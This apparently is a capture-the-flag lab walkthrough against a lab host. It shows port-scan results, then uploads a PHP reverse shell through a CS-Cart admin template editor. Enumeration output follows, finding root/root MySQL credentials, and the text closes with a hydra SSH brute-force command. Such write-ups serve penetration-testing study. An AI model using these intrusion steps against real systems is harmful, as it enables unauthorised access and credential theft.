Open 192.168.157.39:22
Open 192.168.157.39:80
Open 192.168.157.39:110
Open 192.168.157.39:139
Open 192.168.157.39:143
Open 192.168.157.39:445
22/tcp open ssh syn-ack OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
80/tcp open http syn-ack Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
110/tcp open pop3 syn-ack Dovecot pop3d
139/tcp open netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: MSHOME)
143/tcp open imap syn-ack Dovecot imapd
445/tcp open syn-ack Samba smbd 3.0.26a (workgroup: MSHOME)
Found CS-Cart software running on port 80.
http://192.168.157.39/admin.php?target=template_editor
Upload a .phtml file (PHP reverse shell).
[*] usr020 Are there other users in an administrative groups?.............. yes!
---
adm:x:4:patrick
total 28K
drwxr-xr-x 3 root root 4.0K Sep 26 23:07 .
drwxr-xr-x 21 root root 4.0K Apr 24 2008 ..
-rw------- 1 root root 0 Sep 3 2020 .bash_history
-rw-r--r-- 1 root root 2.4K Apr 19 2016 .bashrc
-rw-r--r-- 1 root root 141 May 15 2007 .profile
drwxr-xr-x 2 root root 4.0K Sep 24 2008 .ssh
-rw-r--r-- 1 root root 2.3K Mar 30 2017 capture.cap
---------- 1 root root 33 Sep 26 23:07 proof.txt
---
[*] fst080 Can we read subdirectories under /home?......................... yes!
---
total 24
drwxr-xr-x 2 patrick patrick 4096 Mar 25 2020 .
drwxr-xr-x 3 root root 4096 Apr 12 2016 ..
-rw------- 1 patrick patrick 0 Mar 25 2020 .bash_history
-rw-r--r-- 1 patrick patrick 220 Apr 24 2008 .bash_logout
-rw-r--r-- 1 patrick patrick 2298 Apr 24 2008 .bashrc
-rw-r--r-- 1 patrick patrick 566 Apr 24 2008 .profile
-rw-r--r-- 1 patrick patrick 33 Sep 26 23:07 local.txt
[*] net000 Services listening only on localhost............................ yes!
---
tcp 0 0 127.0.0.1:3306 *:*
---
[!] sof000 Can we connect to MySQL with root/root credentials?............. yes!
Linux version 2.6.22-14-server (buildd@palmer) (gcc version 4.1.3 20070929 (prerelease) (Ubuntu 4.1.2-16ubuntu2)) #1 SMP Sun Oct 14 23:34:23 GMT 2007
Distributor ID: Ubuntu
Description: Ubuntu 7.10
Release: 7.10
Codename: gutsy
[+] Sudo version
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version
Sudo version 1.6.8p12
We then brute-force the SSH user patrick using hydra:
hydra -l patrick -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt 192.168.157.39 ssh